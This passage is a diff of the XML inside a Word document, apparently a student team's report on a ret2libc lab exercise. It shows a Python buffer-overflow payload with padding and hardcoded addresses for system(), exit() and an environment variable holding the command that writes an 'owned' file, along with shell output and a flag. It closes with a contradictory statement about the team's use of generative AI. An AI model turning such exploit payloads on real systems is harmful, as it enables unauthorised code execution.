-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="000000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>cat</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="BBBBBB"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="000000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>flag</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:pStyle w:val="Zkladntext"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:rPr>
           <w:color w:val="BBBBBB"/>
-          <w:u w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="000000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>flag</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="666666"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>{</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="000000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>NEVER_RETURN_TO_STANDARD_LIFE</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="666666"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>}</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:pStyle w:val="Zkladntext"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:rPr>
+          <w:lang/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="000000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>bash-5.0$</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="BBBBBB"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="008000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>exit</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:pStyle w:val="Zkladntext"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="008000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>exit</w:t>
       </w:r>
       <w:r>
-        <w:rPr/>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">On task 2 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>is mostly the same, with the difference that instead of just calling the bash, we execute a series of bash command</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t xml:space="preserve">: “cd /home/user/t0p_s3cr3t &amp;&amp; touch owned &amp;&amp; echo 100 &gt; owned”. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr/>
-        <w:t>This command opens the directory, create the new file, and writes the number (in this case; 100) on the file. For this to work, we define this string as a environment variable with export COMMAND=“cd /home/user/t0p_s3cr3t &amp;&amp; touch owned &amp;&amp; echo 100 &gt; owned”, search for the address of this variable on gdb and replace /bin/sh with this new string that will create the new file.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+        <w:ind w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">On task 2 is mostly the same, with the difference that instead of just calling the bash, we execute a series of bash command: “cd /home/user/t0p_s3cr3t &amp;&amp; touch owned &amp;&amp; echo 100 &gt; owned”. This command opens the directory, create the new file, and writes the number (in this case; 100) on the file. For this to work, we define this string as </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>a</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> environment variable with export COMMAND</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>=“</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">cd /home/user/t0p_s3cr3t &amp;&amp; touch owned &amp;&amp; echo 100 &gt; owned”, search for the address of this variable on </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>gdb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and replace /bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> with this new string that will create the new file.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
         <w:t>TODO: We need blank space here idk why, later I will research.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:lang/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="000000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>python3</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="BBBBBB"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="000000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>-c</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="BBBBBB"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>'</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+          <w:lang/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>import sys</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+          <w:lang/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>from struct import pack # this makes easier to write addresses on little indian format</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+          <w:lang/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>payload = b"A" * 112 # padding</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+          <w:lang/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>payload += pack("&lt;I", 0xf7e15360) # system func address. obtained with print system (inside gdb ret2libc)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+          <w:lang/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>payload += pack("&lt;I", 0xf7e07ec0) # exit func address. obtained with print exit</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+          <w:lang/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
-        </w:rPr>
+          <w:lang/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>#payload += pack("&lt;I", 0xf7f60363) # /bin/sh string address. obtained with grep "/bin/sh" (inside gdb ret2libc)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+          <w:lang/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>payload += pack("&lt;I", 0xffffdeab) # on this address is the env variable COMMAND,</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+          <w:lang/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t># this variable is ="                      cd /home/user/t0p_s3cr3t &amp;&amp; touch owned &amp;&amp; echo 100 &gt; owned"</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+          <w:lang/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t># with four spaces so we can avoid unkown command on the system func</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+          <w:lang/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>sys.stdout.buffer.write(payload)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+          <w:lang/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="BA2121"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>'</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+        <w:ind w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
         <w:t>Result:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
           <w:color w:val="BBBBBB"/>
-          <w:u w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="008000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>cd</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="BBBBBB"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="000000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>t0p_s3cr3t</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="BBBBBB"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="666666"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>&amp;&amp;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="BBBBBB"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="000000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>cat</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="BBBBBB"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
           <w:color w:val="000000"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>owned</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:shd w:fill="F8F8F8" w:val="clear"/>
-        <w:ind w:hanging="0"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
           <w:color w:val="666666"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:i w:val="false"/>
+          <w:lang/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:color w:val="666666"/>
-          <w:u w:val="none"/>
-          <w:shd w:fill="auto" w:val="clear"/>
-          <w:lang w:val="zxx"/>
+          <w:lang/>
         </w:rPr>
         <w:t>100</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+        <w:pStyle w:val="Nadpis1"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Use of Generative Artificial Intelligence</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+      <w:r>
         <w:t>As a team we didn’t use any Generative A.I. tool in any of the thinking, writing or execution of the parts of this assignment nor documentation.</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:before="0" w:after="120"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:t>The GenAI was used during the thinking and debuging of Ret2Libc Practice logic by requesting the GenAI hints and tips for finishing the task. In any case the AI made the entire exercise alone (and the GenAI can’t do it anyways, as it activates the protection against hacking)</w:t>
+      <w:r>
+        <w:t xml:space="preserve">The GenAI was used during the thinking and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>debuging</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> of Ret2Libc Practice logic by requesting the GenAI hints and tips for finishing the task. In any case the AI made the entire exercise alone (and the GenAI can’t do it anyways, as it activates the protection against hacking)</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="even" r:id="rId3"/>
-      <w:headerReference w:type="default" r:id="rId4"/>
-      <w:headerReference w:type="first" r:id="rId5"/>
-      <w:footerReference w:type="even" r:id="rId6"/>
-      <w:footerReference w:type="default" r:id="rId7"/>
-      <w:footerReference w:type="first" r:id="rId8"/>
-      <w:type w:val="nextPage"/>
+      <w:headerReference w:type="even" r:id="rId13"/>
+      <w:headerReference w:type="default" r:id="rId14"/>
+      <w:footerReference w:type="even" r:id="rId15"/>
+      <w:footerReference w:type="default" r:id="rId16"/>
+      <w:headerReference w:type="first" r:id="rId17"/>
+      <w:footerReference w:type="first" r:id="rId18"/>
       <w:pgSz w:w="11906" w:h="16838"/>
-      <w:pgMar w:left="1418" w:right="1418" w:gutter="567" w:header="709" w:top="1418" w:footer="709" w:bottom="1418"/>
-      <w:pgNumType w:fmt="decimal"/>
-      <w:formProt w:val="false"/>
+      <w:pgMar w:top="1418" w:right="1418" w:bottom="1418" w:left="1418" w:header="709" w:footer="709" w:gutter="567"/>
+      <w:cols w:space="708"/>
+      <w:formProt w:val="0"/>
       <w:titlePg/>
-      <w:textDirection w:val="lrTb"/>
